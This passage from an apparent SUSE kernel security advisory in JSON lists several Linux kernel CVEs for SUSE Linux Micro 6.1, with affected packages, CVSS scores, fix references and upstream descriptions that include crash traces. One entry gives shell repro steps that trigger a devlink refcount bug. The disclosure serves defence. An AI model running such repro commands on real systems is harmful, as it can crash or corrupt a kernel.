"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-40242"
},
{
"cve": "CVE-2025-40244",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40244"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfsplus: fix KMSAN uninit-value issue in __hfsplus_ext_cache_extent()\n\nThe syzbot reported issue in __hfsplus_ext_cache_extent():\n\n[ 70.194323][ T9350] BUG: KMSAN: uninit-value in __hfsplus_ext_cache_extent+0x7d0/0x990\n[ 70.195022][ T9350] __hfsplus_ext_cache_extent+0x7d0/0x990\n[ 70.195530][ T9350] hfsplus_file_extend+0x74f/0x1cf0\n[ 70.195998][ T9350] hfsplus_get_block+0xe16/0x17b0\n[ 70.196458][ T9350] __block_write_begin_int+0x962/0x2ce0\n[ 70.196959][ T9350] cont_write_begin+0x1000/0x1950\n[ 70.197416][ T9350] hfsplus_write_begin+0x85/0x130\n[ 70.197873][ T9350] generic_perform_write+0x3e8/0x1060\n[ 70.198374][ T9350] __generic_file_write_iter+0x215/0x460\n[ 70.198892][ T9350] generic_file_write_iter+0x109/0x5e0\n[ 70.199393][ T9350] vfs_write+0xb0f/0x14e0\n[ 70.199771][ T9350] ksys_write+0x23e/0x490\n[ 70.200149][ T9350] __x64_sys_write+0x97/0xf0\n[ 70.200570][ T9350] x64_sys_call+0x3015/0x3cf0\n[ 70.201065][ T9350] do_syscall_64+0xd9/0x1d0\n[ 70.201506][ T9350] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.202054][ T9350]\n[ 70.202279][ T9350] Uninit was created at:\n[ 70.202693][ T9350] __kmalloc_noprof+0x621/0xf80\n[ 70.203149][ T9350] hfsplus_find_init+0x8d/0x1d0\n[ 70.203602][ T9350] hfsplus_file_extend+0x6ca/0x1cf0\n[ 70.204087][ T9350] hfsplus_get_block+0xe16/0x17b0\n[ 70.204561][ T9350] __block_write_begin_int+0x962/0x2ce0\n[ 70.205074][ T9350] cont_write_begin+0x1000/0x1950\n[ 70.205547][ T9350] hfsplus_write_begin+0x85/0x130\n[ 70.206017][ T9350] generic_perform_write+0x3e8/0x1060\n[ 70.206519][ T9350] __generic_file_write_iter+0x215/0x460\n[ 70.207042][ T9350] generic_file_write_iter+0x109/0x5e0\n[ 70.207552][ T9350] vfs_write+0xb0f/0x14e0\n[ 70.207961][ T9350] ksys_write+0x23e/0x490\n[ 70.208375][ T9350] __x64_sys_write+0x97/0xf0\n[ 70.208810][ T9350] x64_sys_call+0x3015/0x3cf0\n[ 70.209255][ T9350] do_syscall_64+0xd9/0x1d0\n[ 70.209680][ T9350] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.210230][ T9350]\n[ 70.210454][ T9350] CPU: 2 UID: 0 PID: 9350 Comm: repro Not tainted 6.12.0-rc5 #5\n[ 70.211174][ T9350] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[ 70.212115][ T9350] =====================================================\n[ 70.212734][ T9350] Disabling lock debugging due to kernel taint\n[ 70.213284][ T9350] Kernel panic - not syncing: kmsan.panic set ...\n[ 70.213858][ T9350] CPU: 2 UID: 0 PID: 9350 Comm: repro Tainted: G B 6.12.0-rc5 #5\n[ 70.214679][ T9350] Tainted: [B]=BAD_PAGE\n[ 70.215057][ T9350] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[ 70.215999][ T9350] Call Trace:\n[ 70.216309][ T9350] \u003cTASK\u003e\n[ 70.216585][ T9350] dump_stack_lvl+0x1fd/0x2b0\n[ 70.217025][ T9350] dump_stack+0x1e/0x30\n[ 70.217421][ T9350] panic+0x502/0xca0\n[ 70.217803][ T9350] ? kmsan_get_metadata+0x13e/0x1c0\n\n[ 70.218294][ Message fromT sy9350] kmsan_report+0x296/slogd@syzkaller 0x2aat Aug 18 22:11:058 ...\n kernel\n:[ 70.213284][ T9350] Kernel panic - not syncing: kmsan.panic [ 70.220179][ T9350] ? kmsan_get_metadata+0x13e/0x1c0\nset ...\n[ 70.221254][ T9350] ? __msan_warning+0x96/0x120\n[ 70.222066][ T9350] ? __hfsplus_ext_cache_extent+0x7d0/0x990\n[ 70.223023][ T9350] ? hfsplus_file_extend+0x74f/0x1cf0\n[ 70.224120][ T9350] ? hfsplus_get_block+0xe16/0x17b0\n[ 70.224946][ T9350] ? __block_write_begin_int+0x962/0x2ce0\n[ 70.225756][ T9350] ? cont_write_begin+0x1000/0x1950\n[ 70.226337][ T9350] ? hfsplus_write_begin+0x85/0x130\n[ 70.226852][ T9350] ? generic_perform_write+0x3e8/0x1060\n[ 70.227405][ T9350] ? __generic_file_write_iter+0x215/0x460\n[ 70.227979][ T9350] ? generic_file_write_iter+0x109/0x5e0\n[ 70.228540][ T9350] ? vfs_write+0xb0f/0x14e0\n[ 70.228997][ T9350] ? ksys_write+0x23e/0x490\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40244",
"url": "https://www.suse.com/security/cve/CVE-2025-40244"
},
{
"category": "external",
"summary": "SUSE Bug 1255033 for CVE-2025-40244",
"url": "https://bugzilla.suse.com/1255033"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40244"
},
{
"cve": "CVE-2025-40248",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40248"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvsock: Ignore signal/timeout on connect() if already established\n\nDuring connect(), acting on a signal/timeout by disconnecting an already\nestablished socket leads to several issues:\n\n1. connect() invoking vsock_transport_cancel_pkt() -\u003e\n virtio_transport_purge_skbs() may race with sendmsg() invoking\n virtio_transport_get_credit(). This results in a permanently elevated\n `vvs-\u003ebytes_unsent`. Which, in turn, confuses the SOCK_LINGER handling.\n\n2. connect() resetting a connected socket\u0027s state may race with socket\n being placed in a sockmap. A disconnected socket remaining in a sockmap\n breaks sockmap\u0027s assumptions. And gives rise to WARNs.\n\n3. connect() transitioning SS_CONNECTED -\u003e SS_UNCONNECTED allows for a\n transport change/drop after TCP_ESTABLISHED. Which poses a problem for\n any simultaneous sendmsg() or connect() and may result in a\n use-after-free/null-ptr-deref.\n\nDo not disconnect socket on signal/timeout. Keep the logic for unconnected\nsockets: they don\u0027t linger, can\u0027t be placed in a sockmap, are rejected by\nsendmsg().\n\n[1]: https://lore.kernel.org/netdev/e07fd95c-9a38-4eea-9638-133e38c2ec9b@rbox.co/\n[2]: https://lore.kernel.org/netdev/20250317-vsock-trans-signal-race-v4-0-fc8837f3f1d4@rbox.co/\n[3]: https://lore.kernel.org/netdev/60f1b7db-3099-4f6a-875e-af9f6ef194f6@rbox.co/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40248",
"url": "https://www.suse.com/security/cve/CVE-2025-40248"
},
{
"category": "external",
"summary": "SUSE Bug 1254864 for CVE-2025-40248",
"url": "https://bugzilla.suse.com/1254864"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40248"
},
{
"cve": "CVE-2025-40250",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40250"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Clean up only new IRQ glue on request_irq() failure\n\nThe mlx5_irq_alloc() function can inadvertently free the entire rmap\nand end up in a crash[1] when the other threads tries to access this,\nwhen request_irq() fails due to exhausted IRQ vectors. This commit\nmodifies the cleanup to remove only the specific IRQ mapping that was\njust added.\n\nThis prevents removal of other valid mappings and ensures precise\ncleanup of the failed IRQ allocation\u0027s associated glue object.\n\nNote: This error is observed when both fwctl and rds configs are enabled.\n\n[1]\nmlx5_core 0000:05:00.0: Successfully registered panic handler for port 1\nmlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to\nrequest irq. err = -28\ninfiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while\ntrying to test write-combining support\nmlx5_core 0000:05:00.0: Successfully unregistered panic handler for port 1\nmlx5_core 0000:06:00.0: Successfully registered panic handler for port 1\nmlx5_core 0000:06:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to\nrequest irq. err = -28\ninfiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while\ntrying to test write-combining support\nmlx5_core 0000:06:00.0: Successfully unregistered panic handler for port 1\nmlx5_core 0000:03:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to\nrequest irq. err = -28\nmlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to\nrequest irq. err = -28\ngeneral protection fault, probably for non-canonical address\n0xe277a58fde16f291: 0000 [#1] SMP NOPTI\n\nRIP: 0010:free_irq_cpu_rmap+0x23/0x7d\nCall Trace:\n \u003cTASK\u003e\n ? show_trace_log_lvl+0x1d6/0x2f9\n ? show_trace_log_lvl+0x1d6/0x2f9\n ? mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core]\n ? __die_body.cold+0x8/0xa\n ? die_addr+0x39/0x53\n ? exc_general_protection+0x1c4/0x3e9\n ? dev_vprintk_emit+0x5f/0x90\n ? asm_exc_general_protection+0x22/0x27\n ? free_irq_cpu_rmap+0x23/0x7d\n mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core]\n irq_pool_request_vector+0x7d/0x90 [mlx5_core]\n mlx5_irq_request+0x2e/0xe0 [mlx5_core]\n mlx5_irq_request_vector+0xad/0xf7 [mlx5_core]\n comp_irq_request_pci+0x64/0xf0 [mlx5_core]\n create_comp_eq+0x71/0x385 [mlx5_core]\n ? mlx5e_open_xdpsq+0x11c/0x230 [mlx5_core]\n mlx5_comp_eqn_get+0x72/0x90 [mlx5_core]\n ? xas_load+0x8/0x91\n mlx5_comp_irqn_get+0x40/0x90 [mlx5_core]\n mlx5e_open_channel+0x7d/0x3c7 [mlx5_core]\n mlx5e_open_channels+0xad/0x250 [mlx5_core]\n mlx5e_open_locked+0x3e/0x110 [mlx5_core]\n mlx5e_open+0x23/0x70 [mlx5_core]\n __dev_open+0xf1/0x1a5\n __dev_change_flags+0x1e1/0x249\n dev_change_flags+0x21/0x5c\n do_setlink+0x28b/0xcc4\n ? __nla_parse+0x22/0x3d\n ? inet6_validate_link_af+0x6b/0x108\n ? cpumask_next+0x1f/0x35\n ? __snmp6_fill_stats64.constprop.0+0x66/0x107\n ? __nla_validate_parse+0x48/0x1e6\n __rtnl_newlink+0x5ff/0xa57\n ? kmem_cache_alloc_trace+0x164/0x2ce\n rtnl_newlink+0x44/0x6e\n rtnetlink_rcv_msg+0x2bb/0x362\n ? __netlink_sendskb+0x4c/0x6c\n ? netlink_unicast+0x28f/0x2ce\n ? rtnl_calcit.isra.0+0x150/0x146\n netlink_rcv_skb+0x5f/0x112\n netlink_unicast+0x213/0x2ce\n netlink_sendmsg+0x24f/0x4d9\n __sock_sendmsg+0x65/0x6a\n ____sys_sendmsg+0x28f/0x2c9\n ? import_iovec+0x17/0x2b\n ___sys_sendmsg+0x97/0xe0\n __sys_sendmsg+0x81/0xd8\n do_syscall_64+0x35/0x87\n entry_SYSCALL_64_after_hwframe+0x6e/0x0\nRIP: 0033:0x7fc328603727\nCode: c3 66 90 41 54 41 89 d4 55 48 89 f5 53 89 fb 48 83 ec 10 e8 0b ed\nff ff 44 89 e2 48 89 ee 89 df 41 89 c0 b8 2e 00 00 00 0f 05 \u003c48\u003e 3d 00\nf0 ff ff 77 35 44 89 c7 48 89 44 24 08 e8 44 ed ff ff 48\nRSP: 002b:00007ffe8eb3f1a0 EFLAGS: 00000293 ORIG_RAX: 000000000000002e\nRAX: ffffffffffffffda RBX: 000000000000000d RCX: 00007fc328603727\nRDX: 0000000000000000 RSI: 00007ffe8eb3f1f0 RDI: 000000000000000d\nRBP: 00007ffe8eb3f1f0 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000\nR13: 00000000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40250",
"url": "https://www.suse.com/security/cve/CVE-2025-40250"
},
{
"category": "external",
"summary": "SUSE Bug 1254854 for CVE-2025-40250",
"url": "https://bugzilla.suse.com/1254854"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40250"
},
{
"cve": "CVE-2025-40251",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40251"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndevlink: rate: Unset parent pointer in devl_rate_nodes_destroy\n\nThe function devl_rate_nodes_destroy is documented to \"Unset parent for\nall rate objects\". However, it was only calling the driver-specific\n`rate_leaf_parent_set` or `rate_node_parent_set` ops and decrementing\nthe parent\u0027s refcount, without actually setting the\n`devlink_rate-\u003eparent` pointer to NULL.\n\nThis leaves a dangling pointer in the `devlink_rate` struct, which cause\nrefcount error in netdevsim[1] and mlx5[2]. In addition, this is\ninconsistent with the behavior of `devlink_nl_rate_parent_node_set`,\nwhere the parent pointer is correctly cleared.\n\nThis patch fixes the issue by explicitly setting `devlink_rate-\u003eparent`\nto NULL after notifying the driver, thus fulfilling the function\u0027s\ndocumented behavior for all rate objects.\n\n[1]\nrepro steps:\necho 1 \u003e /sys/bus/netdevsim/new_device\ndevlink dev eswitch set netdevsim/netdevsim1 mode switchdev\necho 1 \u003e /sys/bus/netdevsim/devices/netdevsim1/sriov_numvfs\ndevlink port function rate add netdevsim/netdevsim1/test_node\ndevlink port function rate set netdevsim/netdevsim1/128 parent test_node\necho 1 \u003e /sys/bus/netdevsim/del_device\n\ndmesg:\nrefcount_t: decrement hit 0; leaking memory.\nWARNING: CPU: 8 PID: 1530 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0\nCPU: 8 UID: 0 PID: 1530 Comm: bash Not tainted 